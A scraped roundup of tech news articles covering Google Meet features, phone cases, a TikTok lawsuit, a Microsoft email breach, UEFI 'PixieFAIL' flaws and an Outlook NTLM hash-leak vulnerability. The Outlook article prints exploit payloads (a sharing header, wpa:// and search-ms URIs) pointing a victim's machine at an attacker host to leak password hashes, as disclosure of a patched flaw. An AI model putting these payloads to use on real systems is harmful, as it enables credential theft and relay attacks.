Google Meet introduces video effects, lighting improvements in latest update

0
[ad_1]
Google Meet is bringing a lot of customization options to users on the web and mobile. The search giant announced this week that three new features that will make it easier to personalize your appearance in Google Meet are coming to the app in the next days.

The first important new feature is the ability to combine multiple video effects. For example, Google Meet users can combine background with filter effects to create a more dynamic experience.

A new layer icon on the self view tile can now be used to keep track of which effects are being used. The same icon can be used to remove one or all effects at once.

The ability to combine video effects comes with a new, more streamlined user interface, which should make it easier for Google Meet users to discover and apply various effects. The effects are grouped by categories: Background, Filters, and Appearance.

Another new feature introduced with the latest update is studio lighting. This is only available for Google Meet users on the web and it’s included with the Duet AI for Google Workspace Enterprise add-on. The new feature can be used to simulate studio-quality lighting and includes the ability to adjust lighting position, brightness, and color.

Last but not least, “studio sound” is now available on the web, with support for the mobile Meet app to be added in the coming weeks. This feature automatically improves poor audio quality from typical Bluetooth headsets and dial-in participants by using AI. Just like studio lighting, this feature is available with the Duet AI for Google Workspace Enterprise add-on.

Both iOS and Android users will be getting some of these features in the next two weeks, while Google Meet users on the web should get them by the end of the month.


[ad_2]
Source link

New Outlook Flaw Let Attackers Access Hashed Passwords

0
[ad_1]

A new Outlook vulnerability that can be used to extract NTLMv2 hashes by exploiting Outlook, Windows Performance Analyzer (WPA), and Windows File Explorer has been identified.

This vulnerability has been assigned with CVE-2023-35636, and the severity has been given as 6.5 (Medium).

This vulnerability was reported to Microsoft in July 2023, and they took action by patching the WPA and File Explorer with “Moderate Severity.”

Microsoft has completely patched this vulnerability in December 2023. However, unpatched systems are still vulnerable to exploitation and stealing of hashed passwords.

This vulnerability is an exploit of the calendar-sharing function in Outlook, which, if two additional headers are added, can result in directing Outlook to connect and share content to an external machine. This connectivity can further be utilized for intercepting NTLMv2 hash.

Suppose an attacker is successful in extracting NTLM v3 hashes. In that case, there are two possible methods of attack, which are Offline brute-force attacks, which can reveal the original password, and authentication relay attacks, in which an authentication request to a server can be manipulated by the attacker with the NTLMv2 hash and get authenticated to the server under the name of the victim. 

Example exploitation (Source: Varonis)

Leaking of NTLM v2 hashes using Outlook

Outlook serves as the email and calendar tool for the Microsoft 365 suite, which is used by millions of people and organizations worldwide.

One of its prime features is the sharing of calendars between users, which can be exploited to trigger an attempt for authentication that can result in redirecting the hashed password to the attacker’s server.

The headers that can be used for exploitation are,

  • “Content-Class” = “Sharing” — tells Outlook that this email contains sharing content.
  • “x-sharing-config-url” = \\(Attacker machine)\a.ics — points the victim’s Outlook to the attacker’s machine.

Leaking NTLM v2 Hashes using URI Handlers

Windows Performance Analyzer (WPA), the default feature in Windows, performs an action to install a URI handler for WPA:// by default, which enables the program to launch automatically when a user clicks on a WPA-related link. 

Moreover, this feature uses NTLM v2 hashes for authentication over the open web. This makes it vulnerable to relay and offline brute-force attacks.

To exploit this WPA, the threat actor can send a payload that will have three parts. 

Full payload:

wpa:////<attacker IP>/bla
wpa:// — tells the operating system that this link should open in WPA.
//<attacker IP> — tells the victim’s machine to access the attacker’s machine via SMB.
/bla — tells the victim’s machine which file to access.

Leaking NTLM v2 Hashes using Windows File Explorer

There is a URI handle “search-ms” that activates the explorer.exe’s search feature and points the explorer.exe process to the web. This explorer.exe is one of the most powerful processes in the Windows Operating system, which has several capabilities to browse files and folders, copy and move files, and create and delete folders.

However, as part of the exploitation, there were two parameters identified as part of Microsoft’s documentation: “subquery” and “crumb”. For exploitation with the “subquery” parameter, the below payload can be used

  • search-ms://query=poc&subquery=\\(Attacker machine)\poc.search-ms
  • search-ms:// – tells the operating system that this link should open in exe.
  • query=poc – Fake search query
  • &subquery=\\(Attacker machine)\poc.search-ms — Path to .search-ms file.

For exploitation with the “crumb” parameter, the below payload can be used,

search-ms://query=poc&crumb=location:\\(Attacker machine)

  • search-ms:// – tells the operating system that this link should open in exe.
  • query=poc – Fake search query
  • crumb=location:\\(Attacker machine) — The location property under the crumb parameter allows the user to specify a path for the search. 

Furthermore, a complete report has been published, providing detailed information about the attack scenarios, exploitation methods, etc.

Try Kelltron’s cost-effective penetration testing services to evaluate digital systems security. Free demo available.


[ad_2]
Source link

Microsoft Executives’ Emails Breached by Russia Hackers

0
[ad_1]

In the latest incident, according to Microsoft, the hackers exploited a compromised “legacy” test account to gain a foothold within the company’s corporate network.

In a concerning turn of events, Microsoft disclosed on Friday that a Russia-linked hacking group known as Nobelium gained access to the email accounts of several top executives, including members of the company’s senior leadership team. The attack, detected last week, raises concerns about potential espionage and the vulnerability of critical infrastructure.

The Attack and the Hackers

Nobelium, also known as Midnight Blizzard, is a cybercriminal group notorious for its involvement in the December 2020 SolarWinds supply chain attack, which compromised numerous government agencies and private companies.

In the latest incident, the hackers exploited a compromised “legacy” test account to gain a foothold within Microsoft’s corporate network. They then leveraged the compromised account’s permissions to access a small portion of employee email accounts, including those belonging to senior executives, cybersecurity personnel, legal staff, and others.

Microsoft’s Response and Potential Impact

While the full extent of the breach is still under investigation, Microsoft maintains that the attack did not involve vulnerabilities in their core products or services. Additionally, they assured customers that no customer data was compromised.

However, the potential consequences remain worrying. The accessed emails could contain sensitive information related to company strategies, intellectual property, and even government contracts.

“We are still investigating the incident and its full scope,” Microsoft stated in a blog post published on January 19, 2024. “We are working with law enforcement to understand the threat actors’ motives and take appropriate action. We are also taking steps to strengthen our security posture further and prevent similar attacks in the future.”

In a regulatory filing on January 17, 2024, Microsoft provided additional details of the cyber attack, stating the following:

“On January 12, 2024, Microsoft detected that beginning in late November 2023, a nation-state associated threat actor had gained access to and exfiltrated information from a very small percentage of employee email accounts including members of our senior leadership team and employees in our cybersecurity, legal, and other functions, on the basis of preliminary analysis.”

“We were able to remove the threat actor’s access to the email accounts on or about January 13, 2024. As of the date of this filing, the incident has not had a material impact on the Company’s operations. The Company has not yet determined whether the incident is reasonably likely to materially impact the Company’s financial condition or results of operations.”

Microsoft

Heightened Cybersecurity Concerns

This incident highlights the growing threat posed by state-sponsored cyberattacks. Experts warn that such attacks are becoming increasingly sophisticated and targeted, highlighting the need for robust cybersecurity measures across all sectors. Governments and businesses must prioritize investments in cybersecurity infrastructure and personnel to mitigate these risks.

The Microsoft email breach serves as a wake-up call for corporations and governments worldwide. As cyberattacks become more prevalent and sophisticated, cybersecurity must become a top priority. Continued vigilance, collaboration between stakeholders, and investment in advanced security solutions are crucial to building resilience against these evolving threats.

This developing story will likely continue to unfold in the coming days and weeks as more details about the attack emerge. We will keep you updated on any significant developments.

  1. Microsoft Outlook Flaw Exploited by Russian Forest Blizzard Group
  2. Scammers Use Fake Ledger App on Microsoft Store to Steal $800K
  3. Microsoft Disables App Installer After Feature is Abused for Malware
  4. Chinese Group Storm-0558 Hacked European Govt Emails, Microsoft
  5. Microsoft: Hackers Sent 927K Phishing Emails with Malicious OAuth Apps

[ad_2]
Source link

9 UEFI Flaws Expose Computers to Remote Attacks

0
[ad_1]

Hackers exploit UEFI flaws to gain unauthorized access to a system’s firmware, enabling them to implant persistent malware or manipulate the boot process.

This provides a stealthy entry point that allows attackers to bypass traditional security measures and maintain control over the compromised system.

Cybersecurity researchers at Quarkslab recently discovered “PixieFAIL” a set of 9 UEFI flaws that makes the computers vulnerable to remote attacks and network hijacking.

PixieFAIL – 9 UEFI Flaws

These nine vulnerabilities affect the IPv6 network protocol stack of EDK II, TianoCore’s open-source reference implementation of UEFI.

Document
Free Webinar

Compounding the problem are zero-day vulnerabilities like the MOVEit SQLi, Zimbra XSS, and 300+ such vulnerabilities that get discovered each month. Delays in fixing these vulnerabilities lead to compliance issues, these delay can be minimized with a unique feature on AppTrana that helps you to get “Zero vulnerability report” within 72 hours.

EDK II’s network stack vulnerabilities surface during network boot in enterprise systems.

This method is common in data centers and HPC environments that streamline OS and software deployment to numerous compute nodes. 

UEFI’s IP stack in the early boot phase exposes a security risk from local network attacks.

PXE was born in 1998 by Intel, and it facilitates network booting through protocols like DHCP, UDP, and TFTP. 

It is incorporated into UEFI, and it expanded to IPv6 in 2010 to broaden the attack surface with additional protocols.

Tianocore’s EDK II is an open-source UEFI implementation that attracts developers for their own projects.

Exploring remote-triggered UEFI vulnerabilities raises questions about potential exploitation and persistence.

For network boot, a client fetches code in stages via TFTP. DHCP enables IP config and Boot Server list retrieval. PXE uses separate DHCP and proxy DHCP services to avoid modifying existing DHCP servers. 

The client selects a Boot Server, obtains NBP parameters, downloads, verifies, and executes. PXE over IPv6 involves DHCPv6 and TFTP and requires a functioning DNS protocol for Boot Server hostnames.

PXE boot process (Source – Quarkslab)

Vendors Affected

Here below, we have mentioned all the vendors that are affected:-

  • Tianocore EDK II UEFI implementation
  • Arm Ltd
  • Insyde Software
  • American Megatrends Inc. (AMI)
  • Phoenix Technologies Inc
  • Microsoft Corporation

Vulnerabilities Detected

Here below, we have mentioned all the vulnerabilities:-

  • CVE-2023-45229: Integer underflow when processing IA_NA/IA_TA options in a DHCPv6 Advertise message
  • CVE-2023-45230: Buffer overflow in the DHCPv6 client via a long Server ID option
  • CVE-2023-45231: Out of Bounds read when handling an ND Redirect message with truncated options
  • CVE-2023-45232: Infinite loop when parsing unknown options in the Destination Options header
  • CVE-2023-45233: Infinite loop when parsing a PadN option in the Destination Options header
  • CVE-2023-45234: Buffer overflow when processing DNS Servers option in a DHCPv6 Advertise message
  • CVE-2023-45235: Buffer overflow when handling Server ID option from a DHCPv6 proxy Advertise message
  • CVE-2023-45236: Predictable TCP Initial Sequence Numbers
  • CVE-2023-45237: Use of a Weak PseudoRandom Number Generator

Make sure to remain vigilant and always use robust security solutions to mitigate threats like this and shield your network.

Try Kelltron’s cost-effective penetration testing services to evaluate digital systems security. Free demo available.


[ad_2]
Source link

X brings audio and video calls to its Android app

0
[ad_1]

X, the Elon Musk-owned social media platform that we previously knew as Twitter, is adding audio and video call support to its Android app. You can now make an audio or video call to another X user directly through the app. The feature requires a Premium subscription, though.

X Android app gains calling support

Audio and video calling was one of the many new features on Elon Musk’s agenda when he purchased Twitter (he rebranded it to X later) for a whopping $44 billion in 2022. The multi-billionaire planned to transform the social network as an “everything app” and the calling feature was integral to those plans. In August last year, X’s new CEO Linda Yaccarino confirmed that the audio and video calls are coming to the app.

The new feature was eventually rolled out to iOS users in October. The company promised to soon bring calling support to the Android app but didn’t provide a timeline. The wait finally ends today. An X engineer working on the project revealed that audio and video calls are “slowly rolling out” to the X Android app. The feature should be available to everyone over the next few days. Make sure to update the app to the latest version.

Once you have updated, X will show you a pop-up banner introducing the new feature the next time you open the app. “Audio and Video calls are here!” the banner reads. It has a shortcut that takes you to the Settings page where you can enable the calling feature. If you mistakenly dismiss the banner, you can navigate to Settings > Privacy and safety > Direct Messages and turn the “Enable audio and video calling” toggle on.

Anyone can receive calls on X

While only users with an X Premium subscription can initiate a call, anyone can receive it. Even if you haven’t bought a subscription, you can receive a call from someone with a subscription. The feature should be available and enabled by both parties, though. The aforementioned settings page also lets you control who can call you.

You can only allow calls only from people in your contacts, people you follow, or all verified users on the platform. X lets you select multiple options. You might also want to enable “Enhanced call privacy” so the other party can’t see your IP address during the call. The calling feature is available with version 10.24 or higher of the X Android app. You can download the latest version from the Google Play Store.


[ad_2]
Source link

Incipio announces launch of its Galaxy S24 case lineup

0
[ad_1]

The Galaxy S24 series is here, and to help protect the investment of buying one of these new phones, Incipio has announced the launch of its new family of cases for these devices. Incipio will make cases for all three models. So regardless of whether or not you get the Galaxy S24, Galaxy S24+, or Galaxy S24 Ultra, Incipio has a case that will help protect your device. Incipio says its case lineup for the phones this year is designed to “offer consumers a variety of cases that balance sustainability, fashion, and reliable device protection.”

In other words, protect your device and add some style to it at the same time. All while the cases are made in a more environmentally sustainable way. As a matter of fact, all of Incipio’s cases are made from recycled materials. The company also doesn’t use plastic in any of its packaging. This means less plastic waste going into landfills or ending up in the ocean. That’s something that consumers can feel good about when purchasing these cases. Especially since not all companies put sustainability at the forefront of their goals.

The Incipio Galaxy S24 case launch includes three options

No matter your style, Incipio seems to have a case option for you and your new Galaxy S24 series phone. Its latest creation is the Cru series. This includes the same level of protection Incipio has come to be known for. But the Cru series cases also come with some more fashionable design traits that will make your phone stand out. Incipio offers options with elevated faux leather, textile, and camo prints. Bringing a unique look to your device. Worth noting is that some of these options are already sold out. But Incipio should end up with more stock relatively soon.

Incipio is also releasing a Duo series of cases for the Galaxy S24 family. Its Duo cases have been around for a while and are a two-piece slim case that provides drop protection of up to 12 feet. There’s also the Forme Protective case which features a floral pattern, and is the case you can see in the image above.

All of the cases are available now save for the out-of-stock options. Duo cases will retail for $34.99, Forme Protective cases will retail for $44.99, and the Cru cases will retail for $49.99. These should eventually make their way to Amazon but for now they seem to be limited to Incipio’s website.


[ad_2]
Source link

Google teases “Mint” color for the Pixel 8 Pro

0
[ad_1]

Google appears to be teasing a new “Mint” colorway for the Pixel 8 Pro, as the company updated its Google Store page recently that says something “Minty Fresh” is coming next week.

The official Made by Google X account put out a similar teaser with a bunch of text written in binary code. When translated, the code says Minty Fresh. Google’s post also showed a graphic of the Bay colorway for the Pixel 8 Pro being covered with a green spray paint. So the suggestion here, is that Google is going to announce a new color of the Pixel 8 Pro. This teaser leans pretty heavily into a green colorway being released in the near future.

It’s not clear what the name of the color will be. But the use of “Minty Fresh” in binary code and on the front page of the Google Store website points to ‘Mint’ being the name. And it would make sense considering the shade of green. However, Google could end up calling this new colorway something else entirely. If a new colorway is indeed what the company is teasing. If it isn’t, it would be a surprise.

A Minty Fresh Pixel 8 Pro may be available on January 25

Google is keeping things pretty tight-lipped here but it’s leaving consumers with at least one more breadcrumb. The reveal date. Whatever this Minty Fresh Pixel 8-related unveiling is, it’s happening on January 25. As 9To5Google points out the binary code also includes a countdown that could be the time of this reveal. The time is 12am PT.

If you’re a night owl, then you’ll likely get to lay eyes on Google’s reveal before most people. At least for those who reside in the US. Another possibility for the timing is just to mark the arrival of January 25. Google is reportedly hosting a live event at 8am PT on the same day where the artist ‘It’s A Living’ is painting a mural in downtown New York City. So this could be the actual timing of the reveal.

Google doesn’t usually release a colorway of its Pixel device for both models. So the fact that this is using a picture of the Pixel 8 Pro suggests that it will be a color that’s only available for the Pro model. However, this isn’t a guarantee. Google could always do something unconventional and release it for both phones. It’s also unclear if Google plans to launch this new colorway on January 25 or if this is just when it plans to announce it.

Either way, we’d keep an eye on things if a bright green Pixel 8 Pro sounds like something you’d be interested in.


[ad_2]
Source link

Iowa sued TikTok alleging inappropriate content

0
[ad_1]

Iowa has sued TikTok, alleging that the platform exposes young users to inappropriate and harmful content. Additionally, the state claims that TikTok misrepresents the severity of such material through deceptive age ratings. Iowa Attorney General Brenna Bird is leading the lawsuit. He says that TikTok is making it hard for parents to monitor what their children are seeing on the app. It comes days after TikTok became the first app to rack up $10 billion in spending.

The state of Iowa sued TikTok for inappropriate content

The problem here is that TikTok says it’s suitable for kids 12 and older. But Iowa is saying that the content on the app is inappropriate for that age group. The App Store’s rules for a “12+” rating allow for a bit of sexual content, profanity, and other things, but Iowa thinks TikTok goes beyond that and should have a stricter “17+” rating.

“TikTok has kept parents in the dark,” said Attorney General Bird, a Republican. “It’s time we shine a light on TikTok for exposing young children to graphic materials such as sexual content, self-harm, illegal drug use, and worse.”

The lawsuit also points out that TikTok’s ratings as “T” for “Teen” on other app stores are not accurate either. This legal action is saying TikTok is tricking people about what’s on their app, and Iowa wants them to pay a fine and stop being misleading.

TikTok’s response to the accusation

TikTok is saying that they have strong safety measures in place for young users. They mentioned things like parental controls and time limits for users under 18. TikTok is assuring everyone that they are committed to dealing with the challenges faced by the whole industry and making sure their community stays safe.

This lawsuit is not the only one against TikTok. Some other US states, like Arkansas and Utah, are also taking legal action. It’s part of a global effort by regulators to protect kids from harmful stuff online. While some cases are still ongoing, a judge in Indiana said no to a lawsuit against TikTok in November. Montana also faced a setback when a judge blocked their attempt to ban TikTok, so they are appealing that decision.


[ad_2]
Source link

Google’s Circle to Search simplifies search experience on Android

0
[ad_1]

Google has consistently strived to enhance search experiences, and the latest step in this journey is the introduction of Circle to Search.

The goal is to allow users to search for information without the need to switch between apps on their Android phones. This feature enables users to perform searches using natural gestures like circling, highlighting, scribbling, or tapping on the subject they want to know more about.

For instance, if a user is watching a creator’s “Outfit of the Day” video and wishes to identify certain items without tagged brands, a simple long press on the home button or navigation bar activates Circle to Search. The user can then employ gestures, such as circling sunglasses or scribbling over a bag, to instantly discover similar options from various online retailers, all without even leaving their current app.

Circle to Search will become available to the Galaxy S24 series and Pixel 8/Pixel 8 Pro on January 31

The multisearch capability of Circle to Search allows users to pose more complex queries about what they see. Suppose a user comes across an image of a tempting corn dog with unique toppings while browsing social media.

By circling the corn dog and asking a question like, “Why are these so popular?” users can quickly access information aggregated from the web, providing insights into the trend and popularity of Korean corn dogs and the broader appeal of Korean cuisine.

Furthermore, the feature supports multitasking while watching videos. For instance, if a user encounters a YouTube Shorts video on an unfamiliar topic, like thrift flipping, circling over the text “thrift flip” provides an immediate explanation of the process, involving purchasing items from thrift stores, refurbishing them, and reselling for profit.

Circle to Search is set to launch on January 31 and will be initially available on select premium Android smartphones, including the Google Pixel 8, Google Pixel 8 Pro, and the new Samsung Galaxy S24 series. This feature aligns with Google‘s commitment to providing a more intuitive and seamless search experience, allowing users to explore their curiosity without interruptions.


[ad_2]
Source link

Lenovo believes it can become the number three smartphone brand

0
[ad_1]

Chinese brand Lenovo is betting hard on its subsidiary Motorola. It bought the brand from Google in 2014 to compete with the likes of Samsung and Apple. Over the years, it has positioned itself as one of the key players in the smartphone range, but there’s more. At least, Lenovo Group’s executive vice president & president (international markets), Matthew Zielinski believes so. He bets Motorola will become the third biggest smartphone player in the world.

Lenovo’s top exec believes Motorola will become third third-biggest smartphone brand

“I would bet a paycheck that in three years we will be number three around the world,” Matthew Zielinski told CNBC. Right now, Motorola and Lenovo together have about 4% of the global smartphone market, according to Counterpoint Research (via CNBC).

Even though this doesn’t sound like a lot, Motorola is doing well in some areas. It’s the third-biggest company in the US. Zielinski explained that Lenovo has a plan to grow its market share in different parts of the world. They want to keep growing steadily until they reach a 10% market share in specific regions. This will add up and help them become more popular globally. They’ve also entered the premium market with the foldable Razr to compete one-on-one with the likes of Apple and Samsung.

Could India help Lenovo/Motorola succeed?

Samsung is currently the most popular smartphone brand in India, according to Counterpoint Research, closely followed by Xiaomi, Vivo, realme, OPPO, etc. Samsung aside, Xiaomi and others entered India about a decade ago.

Motorola had already made it to the South Asian country. Its legacy helped it rebuild trust among users. Despite changes over the years, Indians still associate Motorola with its reputation from the 90s, placing more importance on the brand itself rather than its current ownership.

So, India could be a safe bet for Motorola. Zielinski also mentioned, in the report, that Lenovo may increase manufacturing in Pondicherry, India. He added, “We’re having important talks with the Indian government, and we’re also planning to make more things in India, which will create more jobs there.” He concluded by saying that Lenovo is paying attention to India.


[ad_2]
Source link